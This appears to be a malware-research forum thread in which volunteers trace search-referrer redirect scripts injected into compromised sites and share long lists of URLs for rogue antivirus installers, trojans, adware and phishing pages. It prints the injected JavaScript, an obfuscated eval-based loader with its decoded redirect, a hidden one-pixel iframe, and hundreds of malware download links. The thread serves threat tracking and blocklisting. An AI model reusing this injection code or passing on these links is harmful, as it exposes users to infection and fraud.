}
-------------------
if (document.referrer != "http://verify.com") {
document.write("<span style='display:none' id='d1'>");
}
-
...so except from xanjan.cn...this haitou.php,is it supposed to be phishing related or something?
Or is it some weird kind of stats-tracking? ???
coi.html and/or coiu.html were found in many servers that hosted this obfucated haitoo.php...
Edit:Yeap,it's phishing related indeed,just checked a random coiu.html...
What's weird (and annoying also), is that earlier it's contents were...different! :o
Can't remember though what they contained.... :(
-
Heh...google the text not the redirections.
allyourbasebelongstous
yahoo--> /haitou.php
1 - 10 of 12,200 and its way old too,with all these still lurking and steadily infecting.
Remember the lot of links i posted in private where the browser went into infinite loop...;)
I have used google,msn and yahoo for this search term for well over 4 months and still to this day get jam up hits for malware rotators.
When looking in some directories youll start seeing patterns---> system_.php,move.html,r.html and several others.
Its a part of a very large whole from the beginning of the year,one of those injections we all talked about way back.
-
...so except from xanjan.cn...is it supposed to be phishing related or something?
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {
document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')
means: if your referrer is a search engine( you came to this page from a search engine),
then it redirects you to personal.count....
You will get the following script from this url.
function S(hF,e){if(!e){e='1q$%gV4{<#&G=z:QEHa`Jiy9;d-o[.h+SY,KMvnlU]Z|F()DXOPpLWsN_BmI6Rwt';}var x;var Rg='';for(var I=0;I<hF.length;I+=4){x=(e.indexOf(hF.charAt(I))&255)<<18|(e.indexOf(hF.charAt(I+1))&255)<<12|(e.indexOf(hF.charAt(I+2))&255)<<(6)|e.indexOf(hF.charAt(I+3))&255;Rg+=String.fromCharCode((x&16711680)>>16,(x&65280)>>8,x&255);}eval(Rg);}S('d4RK.yWvolE).N#].4JU#pOp;P[|#N#][{Ew<4HD;Ni(dyBLGnOD;sVL-yR)Qa#U.{HX:,6Dds6([szYo,WX;PBKosLDQNi]d%LOz`<,<%XD[s=l&P.P-9qLQ,[]:P1S');
decodes to
document.write('<sc'+'ript> document.location="http://go-scan-pc.com/?uid=152" </sc'+'ript>');
go-scan-pc.com (ESTDOMAINS) has no content at the moment.
-
go-scan-pc.com redirs to;
http://scan-ia.com/20/?uid=152&in=1&xx=1&end=1&g=1&h=0&ag=1
Which gives you an 84K file (UPolyX v0.5 packed according to UE);
http://scan-ia.com/download/IAInstall.exe
-
Detection is rubbish (3/36)
/edit
Just for kicks and giggles ;)
http://hosts-file.net/?s=216.32.69.165
http://hosts-file.net/?s=216.32.69.165&sDM=1#matches
I had 9 already listed ..... I've now got 48 on this IP :)
-
go-scan-pc.com
scan-ia.com
= ESTDOMAINS
KOKACH !!
-
I'd be surprised if they weren't all Est ......... "cleaning up" my arse .....
-
Detection is rubbish (3/36)
Report from Anubis :
http://anubis.iseclab.org/result.php?taskid=a2867294c98294b4c5be525712d4473a&refresh=1 (http://anubis.iseclab.org/result.php?taskid=a2867294c98294b4c5be525712d4473a&refresh=1)
IAInstall.exe downloads
hxxp://ia-install.com/download/InternetAntivirus.exe
http://www.virustotal.com/de/analisis/612efcc0065c050fb49876f6a82f476b (http://www.virustotal.com/de/analisis/612efcc0065c050fb49876f6a82f476b)
-
you'll start seeing patterns ---> system_.php,move.html,r.html and several others.
That's why I said... ;)
"Whatever the case,all of the following are open dirs,
so you can examine directories/scripts contained there at will..."
And there's even more crap planted there per occasion except from the above patterns,
but I didn't had the patience to try following them over...
go-scan-pc.com
scan-ia.com
= ESTDOMAINS
KOKACH !!
(http://bestsmileys.com/lol/1.gif)
(UPolyX v0.5 packed according to UE);
At least at a first glance,it seems to be a home-made protection,but I may be wrong on this...
it's been years since I had checked UPolyX...maybe I should so again ;)
-
http://stat.antivirusxp08.net/download/AntivirusXP2008Installer.exe
http://fwt.txdnl.com/4-10/j/a/jacklinda1/videos2008.exe
http://fwt.txdnl.com/5-10/v/i/videoshowww/You_tube_play.exe
http://fwt.txdnl.com/6-10/d/o/downloadflash/svchostss.exe
http://fwt.txdnl.com/6-30/p/h/phongcan/girlvietvip.jpg
-
I agree,the thread here has already got messy...and it's my fault.
I'll edit/move the haitou.php links I've posted in a new thread...
-
nice discussion ;D
-
Lol! :D
-
nice discussion ;D
I'm sorry. This was your thread. We have messed it up. ;D
-
Blame it on TJS :P
-
lol
-
http://www.mastercrew.xpg.com.br/CPF.jpg 5.4M
http://dd7.tesekl.info/net.exe
http://trabalho01.pisem.su/imglog.jpg 2.7M
http://greg-search.com/G7/control.exe
http://novotempo01.sites.uol.com.br/nega.jpg
http://gsnet.front.ru/gm.exe
-
Thank you.
-
nice discussion ;D
I'm sorry. This was your thread. We have messed it up. ;D
That's ok:)
Glad to see your discussion :P
-
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880658.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880154.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880658.exe
http://ia-scanonline.com/download/IAInstall.exe
-
http://enu.v6.update.cab.en.winupdate.com.updatescabensrv70.cn/setup.exe
https://s.aolcdn.com/art/aimindia/aol_india_messenger_6.5.16.2.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_880595.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_77040502.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_880113.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_880181.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_880056.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_77013615.exe
http://onlineprivatescan.com/2009/download/trial/A9installer_77040506.exe
http://fullantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://fullantivirusscan.com/2009/download/trial/A9installer_77071503.exe
http://www.acespy.com/dls/acespy.exe
http://secureclick1.com/2009/download/trial/A9installer_880285.exe
http://secureclick1.com/2009/download/trial/A9installer_880293.exe
http://secureclick1.com/2009/download/trial/A9installer_880488.exe
http://secureclick1.com/2009/download/trial/A9installer_880135.exe
http://secureclick1.com/2009/download/trial/A9installer_880551.exe
http://secureclick1.com/2009/download/trial/A9installer_880705.exe
http://secureclick1.com/2009/download/trial/A9installer_880221.exe
http://ia-scanonline.com/download/IAInstall.exe
http://bestprivatetube.com/cd/519/0/Adobe%20Acrobat%20Pro%207.0%20(Serial).exe
http://bestprivatetube.com/cd/519/0/Active%20Partition%20Recovery%20v3.0.exe
http://bestprivatetube.com/cd/519/0/Zoom%20Search%20Engine%20Professional%20Edition%20v5.1.exe
http://bestprivatetube.com/cd/519/0/Mystery%20P.I.%20The%20Lottery%20Ticket%20v1.0.0.3%20by%20LineZer0.exe
http://personalantispy.com/.ware/js/order.js
http://www.personalantispy.com/.ware/js/order.js
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880658.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880154.exe
http://stat.antimalware2009.com/download/17/AntiMalware2009Installer.exe
http://stat.antivirusxp08.net/download/AntivirusXP2008Installer.exe
http://theprivatetube.com/cd/219/0/wmcodec_update.exe
http://theprivatetube.com/cd/174/0/wmcodec_update.exe
http://theprivatetube.com/cd/183/0/wmcodec_update.exe
http://theprivatetube.com/cd/83/0/wmcodec_update.exe
http://theprivatetube.com/cd/357/0/wmcodec_update.exe
http://theprivatetube.com/cd/402/0/image_decoder.exe
http://theprivatetube.com/cd/767/0/wmcodec_update.exe
http://theprivatetube.com/cd/519/0/AutoDesk%20AutoCAD%202007.exe
http://softwaredesign6.com/2009/download/trial/A9loader_770522160214.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164720.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_77052201.exe
http://smartantivirusv2.com/soft/sa2009.exe
http://viruslabs2009.com/distrib/1/virlab_install.exe
http://viruslabs2009.com/distrib/1012/virlab_install.exe
http://scanner.microantivirus-2009.com/setup/install_3697_MHwzNnwxMDEwMDAwMDAwfHx8fHx8fHw_.exe
http://scanner.microantivirus-2009.com/setup/install_4887_MHwzNnwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
http://scanner.microantivirus-2009.com/setup/install_4749_MHwzNnwxMDIwMDAwMDAwfHx8fHx8fHw_.exe
http://win-antivirus-2008.com/a/Install.exe
http://scanner.win-antivirus-2008.com/setup/setup_1257_MHwzM3wxMDIwMDAwMDAwfHx8fHx8_.exe
http://up.50db34d5.info/update.gif
http://xh-codec.net/download/crack.Steinberg.Nuendo.3.2.0.1128c3098.exe
http://xh-codec.net/download/crack.Visual.CertExam.Suite.1.9.978c3098.exe
http://xh-codec.net/download/keygen.Nero.8.3.6.0c3098.exe
http://xh-codec.net/download/keygen.Nero.8.3.6.0c3098.exe
http://xh-codec.net/download/keygen.Norton.Internet.Security.2008c3098.exe
http://xh-codec.net/download/keygen.Microsoft.Live.OneCare.2.0c3098.exe
http://xh-codec.net/download/keygen.RealPlayer.11.0.0.446c3098.exe
http://xh-codec.net/download/serial.Microsoft.Live.OneCare.2.0c3098.exe
http://stat.antivirusxp08.net/download/16/AntivirusXP2008Installer.exe
http://stat.antivirusxp08.net/download/AntivirusXP2008Installer.exe
http://www.registrycleanerxp.com/download/setup_rcxp.exe
http://216.12.204.2/softwareclub/sccdc.exe
http://216.12.204.2/softwareclub/scnb.exe
http://216.12.204.2/softwareclub/scdr.exe
http://216.12.204.2/softwareclub/scax.exe
http://216.12.204.2/softwareclub/scnl.exe
http://216.12.204.2/softwareclub/scmp.exe
http://216.12.204.2/softwareclub/sccs.exe
http://216.12.204.2/softwareclub/scsm.exe
http://216.12.204.2/softwareclub/scst.exe
http://216.12.204.2/softwareclub/scaex.exe
http://216.12.204.2/softwareclub/sccc.exe
http://viruslabs2009.com/distrib/1/virlab_install.exe
http://viruslabs2009.com/distrib/1012/virlab_install.exe
http://download.dailykeys.com/files/intellij%20idea%207.0.4.exe
http://download.dailykeys.com/files/animal%20seks%20video.com.exe
http://kpdef8.com/download/rhtools14e.zip
http://ntsecurity.nu/downloads/clearlogs.exe
http://soft.enet.org.cn/kejian/gongju/X-Scan-v3.3-cn.rar
http://downloads.zango.com/zangogames/library/setuplibrary2797.exe
http://downloads.zango.com/zangogames/dvg/setupdavid2365.exe
http://downloads.zango.com/zangogames/chamber/setupchamber2848.exe
http://upgrades.hotbar.com/installs/hotbar/programs/4.8.0.0/hbtstart.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.cab
http://installs.hotbar.com/installs/hbtools/programs/hbtools.exe
http://downloads.zango.com/zangogames/zangotv/setupzangotv2593.exe
http://installs.hotbar.com/installs/hotbar/programs/10.0.368.0/hotbar.exe
-
phishing:
hxxp://mess.network-hosting.com/pey/Confirm.htm
fake alert:
nod-32.net
porn:
bestyounggirls.com
enakedgirls.com
previewadultvideos.com
-
eigenstart.nl
hxxp://www.eigenstart.nl/toolbar/content/eigenstartsetup.exe
myspyprotector.com
hxxp://www.myspyprotector.com/software/myspyprotector_04.exe
hxxp://www.myspyprotector.com/software/myspyprotector_03.exe
hxxp://www.myspyprotector.com/software/myspyprotector_05.exe
pic iframe
hxxp://picturelink.66735.com/member/img/reg.gif
hxxp://picturelink.66735.com/plus/img/file_move.gif
hxxp://picturelink.66735.com/plus/img/sysinfo.gif
hxxp://picturelink.66735.com/plus/img/bad.gif
visualscanprotection.com
hxxp://visualscanprotection.com/download/av_2009.exe
-
Thank you.
-
Fake alert
uav2008.com
bestprivatetube.net
antivirus-2009-pro.net
Porn
hardxtc.com
olderporntubes.com
hxxp://www.bestprivatetube.net/cd/603/5/wmcodec_update.exe
-
Adwares
203.117.111.46/banners/bak.php?b=3002
203.117.111.46/banners/bak.php?b=3024
203.117.111.46/banners/des2.php?b=3002
203.117.111.46/banners/des2.php?b=3024
203.117.111.46/banners/pr.php?b=3002
203.117.111.46/banners/pr.php?b=3024
203.117.111.46/banners/xp.php?b=3002
203.117.111.46/banners/xp.php?b=3024
64.225.156.213/EV191065/?code=BundleBase1.1065
64.225.156.213/reporting/IpGeo.aspx
64.225.156.213/xmi2h/awmT251.exe
85.17.166.229/gtest2/index.php?sid=053001340235073507360b3d053c0e380934
85.17.166.229/gtest2/load.php?id=0&sid=053001340235073507360b3d053c0e380934&spl=1
85.17.166.229/gtest2/pdf.php?id=0&sid=053001340235073507360b3d053c0e380934
aaqarkznvb.com/progs/zrxyyvz/hdnos.php?adv=adv449&code1=JNL0&code2=3103&id=-186345958&p=1
aaqarkznvb.com/progs/zrxyyvz/nwgunnool.php
aaqarkznvb.com/progs/zrxyyvz/vocmzaan
aaqarkznvb.com/progs/zrxyyvz/zsscd.php?adv=adv449
ad.netcrefer.net/banner/serve.php?sv=300x250
ad.netcrefer.net/banner/show.php?cid=1479844&tid=6456212511&sv=300x250
ad.netcrefer.net/code/const.php
ad.netcrefer.net/code/jvmvers.jar
ad.netcrefer.net/code/smain.php?scout=acxcobj
ad.netcrefer.net/code/smain.php?scout=acxcrds
ad.netcrefer.net/code/smain.php?scout=jvcxeng
ad.netcrefer.net/code/smain.php?scout=objmsit
ad.netcrefer.net/code/srun.php
ad.netcrefer.net/get.php?src=eeevsnet
ad.netcrefer.net/get.php?src=rasesnet
ad.netcrefer.net/get.php?src=wavvsnet
ad.netcrefer.net/get.php?src=winvsnet
ad.netcrefer.net/servecs?atype=p0
ad.netcrefer.net/xpre.exe
ad.netcrefer.net/xrun.exe
ad.trafficmp.com/a/js?plid=6224&ad_w=160&ad_h=600
ad.trafficmp.com/a/js?plid=6443&ad_w=468&ad_h=60
ad.trafficmp.com/a/js?plid=6741&ad_w=120&ad_h=600
ad.trafficmp.com/a/js?plid=7564&ad_w=120&ad_h=600
ad.trafficmp.com/a/js?plid=7567&ad_w=468&ad_h=60
ad.trafficmp.com/a/js?plid=8468&ad_w=120&ad_h=600
ad.trafficmp.com/a/js?plid=9343
ad.trafficmp.com/a/pbk?adv=395&dim=15
bizcash.info/go/to.php?id=003
bizcash.info/go/to.php?id=004
bizcash.info/go/to.php?id=005
bizcash.info/go/to.php?id=dal001
dl.targetsaver.com/2k/affupdate2.php?affversion=0.0.0.0&tsversion=4.0.4.1&code=1804289383&aid=109&continent=136211462&country=840®ion=11&metro=524&city=3670
dl.targetsaver.com/2k/tsinstall_4_0_4_0_b4.exe
dl.targetsaver.com/2k/tsupdate_4_0_4_1_b3.exe
dl.targetsaver.com/2k/tsupdate2.ini
dl.targetsaver.com/2k/tsupdate2.php
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fads.vidsense.com%2Fr%2F259%2Fa%2F100196%2Fl%2Fat0rm6&affiliateID=8279&trace=T:6(82314)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fads.vidsense.com%2Fr%2F260%2Fa%2F100196%2Fl%2F6h1ce4&affiliateID=8244&trace=T:6(79772)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fgo.egotvonline.com%2Fr%2F1311%2Fa%2F157059%2Fl%2Fsk5vw5&affiliateID=8215&trace=T:6(75969)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fgo.egotvonline.com%2Fr%2F1311%2Fa%2F157059%2Fl%2Fxx8kn3&affiliateID=8228&trace=T:6(78308)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fpopunder.multi-pops.com%2FadsDirect.php%3Fcid%3D7490990%26id%3Dfindology07%26sid%3D73440%26ref%3Dhttp%3A%2F%2Fwww.findology.com&affiliateID=2957&trace=T:
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fservedby.onlinemediadiva.com%2Fcode%3Fdcc%3Don%26pid%3D1460%26gid%3D4&affiliateID=8357&trace=T:6(85978)
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fwww.vbs.tv%2Findex_quiet2.php&affiliateID=6604&trace=T:
dl.targetsaver.com/vtrack.php?params=13952ac125d48993f1498456b9697dfe296faa94-cGlkPTE0OSZjYW1wYWlnbklEPTM4MDMmY3JlYXRpdmVJRD0zNDkyJmlwPTk3Ljgw%0ALjEzNy4xMTAmdHJhY2U9NCgxNTcwKTEwKDc1MzI2MSkmY3B2X3JhdGU9MC4wMTA5%0AMDAmQ291bnRyeUNvZGU9ODQwJnNycG5hbWU9Q1BWaW50ZXJuJnNhaWQ9MCZrZXl3%0Ab3JkPWNvbnNvbGlkYXRpb24lMjBsb2FuJTIwcmVmaW5hbmNlJTIwc3R1ZGVudA%3D%3D%0A
dl2.bundlext.com/get.php?p=3cd898b13299cb4bc0d5dc64745518ed&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=773953af7fc444d491933450d966e0b2&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=8605fbac333a37d112b7d4b2e6de281f&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=93e4c2046fcb4ac4bdc3dbbcc28127fb&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=b433b5a80d2cb00f8f1c54387f9aa332&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=c1f5cc94a30f082054f3a00e6655462d&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=26453da423d82a5fc6fae941d05f1151&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=718f466754402ac597de014577627f96&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=a537119c47192bc08952189ae8782f08&cb2=6900cc07255f403aa633f9364283176b
espads.net/banner/serve.php?sv=728x90
espads.net/banner/show.php?cid=1136935&tid=5167264347&sv=728x90
espads.net/banner/show.php?cid=1141348&tid=5164003215&sv=728x90
espads.net/banner/show.php?cid=1470144&tid=5165524616&sv=728x90
espads.net/banner/show.php?cid=1735912&tid=5167311394&sv=728x90
espads.net/code/smain.php
espads.net/code/smain.php?scout=acxcobj
espads.net/code/smain.php?scout=acxcrds
espads.net/code/smain.php?scout=jvcxeng
espads.net/placeholder-1679546-2213145333
espads.net/xrun.exe
randomnewnames.com/paypopup.html
randomnewnames.com/v/files/targets.gz
randomnewnames.com/v/we-active.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0&pc=0&pc2=0&country=US
randomnewnames.com/v/we-config.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&ucnt=0
randomnewnames.com/v/we-connect.php
randomnewnames.com/v/we-content.php?cid=16&uid=17646394261871452226&rnd=5803
randomnewnames.com/v/we-content.php?cid=356&uid=17646394261871452226&rnd=9651
randomnewnames.com/v/we-content.php?cid=358&uid=17646394261871452226&rnd=3721
randomnewnames.com/v/we-content.php?cid=359&uid=17646394261871452226&rnd=9371
randomnewnames.com/v/we-content.php?cid=374&uid=17646394261871452226&rnd=4611
randomnewnames.com/v/we-content.php?cid=374&uid=17646394261871452226&rnd=6433
randomnewnames.com/v/we-content.php?cid=377&uid=17646394261871452226&rnd=2910
randomnewnames.com/v/we-content.php?cid=380&uid=17646394261871452226&rnd=3931
randomnewnames.com/v/we-content.php?cid=382&uid=17646394261871452226&rnd=2432
randomnewnames.com/v/we-content.php?cid=382&uid=17646394261871452226&rnd=2559
randomnewnames.com/v/we-content.php?cid=385&uid=17646394261871452226&rnd=648
randomnewnames.com/v/we-content.php?cid=387&uid=17646394261871452226&rnd=5666
randomnewnames.com/v/we-content.php?cid=388&uid=17646394261871452226&rnd=2422
randomnewnames.com/v/we-content.php?cid=390&uid=17646394261871452226&rnd=432
randomnewnames.com/v/we-dictionaries.php
randomnewnames.com/v/we-install.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&key=e00f3e0322f287351fc10feff0471412
randomnewnames.com/v/we-popup.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&kw=ron&country=US
randomnewnames.com/v/we-tpa.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0
www.antispyware-review.biz/a/b1.html?wmid=4663&pwebmid=4Ks8J4I1JV&a=
www.antispyware-review.biz/a/b3.html?wmid=4663&pwebmid=4Ks8J4I1JV&a=
www.antispyware-review.biz/a/b4.html?wmid=4663&pwebmid=4Ks8J4I1JV&a=
www.antispyware-review.biz/a/b5.html?wmid=4663&pwebmid=4Ks8J4I1JV&a=
ya-tracker.com/pdfdoc/index.php?id=468
ya-tracker.com/pdfdoc/index.php?id=728
-
Fake antivirus
eantivirus-payment. com
e-antiviruspro. com
Porn
lamaporn.com
ebony-black-pussy.net
Trojan
hxxp://www.yyjjoopp.com/abc.exe
hxxp://exetools.com/files/unpackers/win/ni2untelock.zip
hxxp://exetools.com/files/stickers/exebind.zip
hxxp://exetools.com/files/others/ratpackr.zip
-
http://msn.account.hotmail.ru/Cancelar.exe
http://albumbloglinda.hotmail.ru/album.exe
http://download.a-a-v-2008.com:8080/AAVSetup.exe
http://zfzuguo.cn/hb/24.exe
http://zfzuguo.cn/hb/7.exe
http://zfzuguo.cn/goole10.exe
-
hxxp://msn.account.hotmail.ru/Cancelar.exe
Great domain name. lol.. thx for sharing.
TJS
-
from hxxp://zfzuguo.cn/updater.txt
hxxp://mb02.cn/hb/0.exe
hxxp://mb02.cn/hb/1.exe
hxxp://mb02.cn/hb/2.exe
hxxp://mb02.cn/hb/3.exe
hxxp://mb02.cn/hb/4.exe
hxxp://mb02.cn/hb/5.exe
hxxp://mb02.cn/hb/6.exe
hxxp://mb02.cn/hb/7.exe
hxxp://mb02.cn/hb/8.exe
hxxp://mb02.cn/hb/9.exe
hxxp://mb02.cn/hb/01.exe
hxxp://mb02.cn/hb/10.exe
hxxp://mb02.cn/hb/11.exe
hxxp://mb02.cn/hb/12.exe
hxxp://mb02.cn/hb/13.exe
hxxp://mb02.cn/hb/14.exe
hxxp://mb02.cn/hb/15.exe
hxxp://mb02.cn/hb/16.exe
hxxp://mb02.cn/hb/17.exe
hxxp://mb02.cn/hb/18.exe
hxxp://mb02.cn/hb/19.exe
hxxp://mb02.cn/hb/20.exe
hxxp://mb02.cn/hb/21.exe
hxxp://mb02.cn/hb/22.exe
hxxp://mb02.cn/hb/23.exe
hxxp://mb02.cn/hb/24.exe
hxxp://mb02.cn/hb/25.exe
hxxp://mb02.cn/hb/27.exe
hxxp://mb02.cn/hb/28.exe
hxxp://mb02.cn/hb/29.exe
hxxp://mb02.cn/hb/30.exe
hxxp://mb02.cn/hb/26.exe
hxxp://mb02.cn/hb/31.exe
-
from hxxp://zfzuguo.cn/updater.txt
hxxp://mb02.cn/hb/0.exe
hxxp://mb02.cn/hb/1.exe
hxxp://mb02.cn/hb/2.exe
hxxp://mb02.cn/hb/3.exe
hxxp://mb02.cn/hb/4.exe
hxxp://mb02.cn/hb/5.exe
hxxp://mb02.cn/hb/6.exe
hxxp://mb02.cn/hb/7.exe
hxxp://mb02.cn/hb/8.exe
hxxp://mb02.cn/hb/9.exe
hxxp://mb02.cn/hb/01.exe
hxxp://mb02.cn/hb/10.exe
hxxp://mb02.cn/hb/11.exe
hxxp://mb02.cn/hb/12.exe
hxxp://mb02.cn/hb/13.exe
hxxp://mb02.cn/hb/14.exe
hxxp://mb02.cn/hb/15.exe
hxxp://mb02.cn/hb/16.exe
hxxp://mb02.cn/hb/17.exe
hxxp://mb02.cn/hb/18.exe
hxxp://mb02.cn/hb/19.exe
hxxp://mb02.cn/hb/20.exe
hxxp://mb02.cn/hb/21.exe
hxxp://mb02.cn/hb/22.exe
hxxp://mb02.cn/hb/23.exe
hxxp://mb02.cn/hb/24.exe
hxxp://mb02.cn/hb/25.exe
hxxp://mb02.cn/hb/27.exe
hxxp://mb02.cn/hb/28.exe
hxxp://mb02.cn/hb/29.exe
hxxp://mb02.cn/hb/30.exe
hxxp://mb02.cn/hb/26.exe
hxxp://mb02.cn/hb/31.exe
Thanks for sharing :)
-
http://www.ecotopo.com.au/
open dir
-
hxxp://www.zssotke.edu.sk/zdruzenacik/explorer-7.0.exe
hxxp://blacktie-affair.org/Smileys/Zamiana/stick.gif
||
<iframe width=1 height=1 src="hxxp://download.getmirar.com/875455"> </iframe>
||
hxxp://download.getmirar.com/875455/exes/Mirar_Toolbar_Setup.exe
hxxp://ak.imgfarm.com/images/nocache/copilot/1.0.8.0/iWonSetup1.0.8.0.exe
hxxp://www.cliprex.com/files/Cflv.exe
hxxp://www.cliprex.com/files/CliprexLite.exe
-
hxxp://myprivatetube.net/cd/376/0/wmcodec_update.exe
hxxp://myprivatetube.net/cd/174/0/wmcodec_update.exe
hxxp://scanner.rapidantivirus.com/setup/install_4876_MHw0MXwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
hxxp://www.nortonsoft.com/supportlogic/smilies/video-nude-anjelia.avi.exe
-
hxxp://www.alpha-accz.ws/image.jpg.exe
hxxp://www.alpha-accz.ws/ri0t.exe
hxxp://virus-labs2009.com/distrib/1/virlab_install.exe
hxxp://125.91.10.231/js/suen.exe
hxxp://download.a-a-v-2008.com:8080/AAVSetup.exe
hxxp://www.lastwmpupdate.com/download.php?id=1684
hxxp://www.lastwmpupdate.com/download.php?id=417
hxxp://www.lastwmpupdate.com/download.php?id=1161
hxxp://www.lastwmpupdate.com/download.php?id=1640
hxxp://www.lastwmpupdate.com/download.php?id=1464
-
Thanks.
-
trojan zlob
trojan zlob
http://ticketmoon.net/download/pageticket2000.exe
fake
http://download.antispywareexpert.com/ASE_Setup_Free.exe
http://download.antispywareexpert.com/ASE_Setup_Free_fr.exe
http://www.xprivatetube.com/cd/26/2001/wmcodec_update.exe
http://www.xprivatetube.com/cd/680/0/wmcodec_update.exe
http://www.xprivatetube.com/cd/184/0/wmcodec_update.exe
http://www.xprivatetube.com/cd/603/4/wmcodec_update.exe
http://xprivatetube.com/cd/wmcodec_update.exe
-
http://02c1cb8.netsolhost.com/pesa.exe
http://www.administrafacil.com.br/administrafacil.exe
http://downloads.5star-network.com/Internet/amazon.exe
http://downloads.5star-network.com/Internet/wg20.exe
http://downloads.5star-network.com/Utilities/cs_mary.exe
http://download.a-a-v-2008.com:8080/AAVSetup.exe
http://free-stream-videos-here.com/soft/install-299.exe
http://free-stream-videos-here.com/soft/install-301.exe
-
209.62.106.80/CFL/4Ks8J4I1JV0009Lcw3sF0pw2?ts=0
209.62.106.80/CFL/4Ks8J4I1JV0009Lcw3sF0pw2?ts=0000001a
209.62.106.80/CFL/4Ks8J4I1JV0009Lcw3sF0pw2?ts=000003e9
209.62.106.80/K/C2?a=bdlrtpe&k=mpdevlg&wmid=4Ks8J4I1JV&ucid=Lcw3sF0pw2
209.62.106.80/K/F2?a=bdlrtpe&k=mpdevlg&wmid=4Ks8J4I1JV&ucid=Lcw3sF0pw2
209.62.106.80/K/H?a=bdlrtpe&k=mpdevlg&wmid=4Ks8J4I1JV&ucid=Lcw3sF0pw2
209.62.106.80/NL2/?w=4Ks8J4I1JV&ucid=Lcw3sF0pw2&e=00000001&err=00000012
209.62.106.80/NL2/?w=4Ks8J4I1JV&ucid=Lcw3sF0pw2&e=00000003&err=0
209.62.106.80/NL2/?w=4Ks8J4I1JV&ucid=Lcw3sF0pw2&e=0000000a&err=00000012&a=11
209.62.106.80/NL2/?w=4Ks8J4I1JV&ucid=Lcw3sF0pw2&e=0000000a&err=000001e7&a=10
209.62.106.80/PN/104Ks8J4I1JV0009Lcw3sF0pw2
209.62.106.80/PN/114Ks8J4I1JV0009Lcw3sF0pw2
64.225.156.213/xmi2h/awmT251.exe
72.32.209.119/select.php?id=44
72.32.209.119/select.php?id=45
72.32.209.119/select.php?id=56
82.103.138.10/ls/?h=1&c=6480&d=2967&0
82.103.138.10/ls/?h=5a.0gi?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
82.103.138.10/ls/?t=25
82.103.138.10/ls/?t=4&e=1811&f=13799&l=707
85.17.166.182/cmtr/nd82m0.dll?setid=ish6&affid=166350&uid=56F04722947211DD91DC166350CFFFFF&rid=zdez&guid=FDAAA03B61B248FC94BFC8DD9B70690F
89.18.189.165/img/cntr.dll?sid=FC545F5A4F080F0F000D54585F5F5A5C594F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495B4F0A000D542F2D282828595A2B5F582B5B5D512F2A505D2B2F2A512D2D502B5E595F50592F4F081D545C5F2F595D5E5B5B505D5E5B58582D2D50582D2A585F5F5A5C592A2F2F2F2F2F4F1E1D545D0C5D5D0B5C5B5F59584F0B0054585E5E4F04061B1901000D54001A015F4F1B0C1F000D54505D585B699501
89.188.16.44/bdb/upd105320.dll?setid=ish6&affid=166350&uid=56F04722947211DD91DC166350CFFFFF&guid=FDAAA03B61B248FC94BFC8DD9B70690F&rid=zdez
b152.bundlext.com/ack.php?uid=F4E4961A-08A1-1033-0410-0710070001&version=16&actionname=_regcheck&action=CheckBundle%2E103&success=true&debug=TargetSaver&nocache=2608
b152.bundlext.com/ack.php?uid=F4E4961A-08A1-1033-0410-0710070001&version=16&actionname=_regcheck&action=CheckBundle%2E104&success=true&debug=yes&nocache=3996
b152.bundlext.com/ack.php?version=16&myVer=2&uid=F4E4961A-08A1-1033-0410-070000000001&status=OK&l=19999
b152.bundlext.com/ack.php?version=16&myVer=2&uid=F4E4961A-08A1-1033-0410-070000000001&status=OK&l=36666666666661:80000003|6666666666666666665:0|
b152.bundlext.com/ack.php?version=16&S=ExecOk&l=36666666666661:80000003666666666666666666776666667665:0|
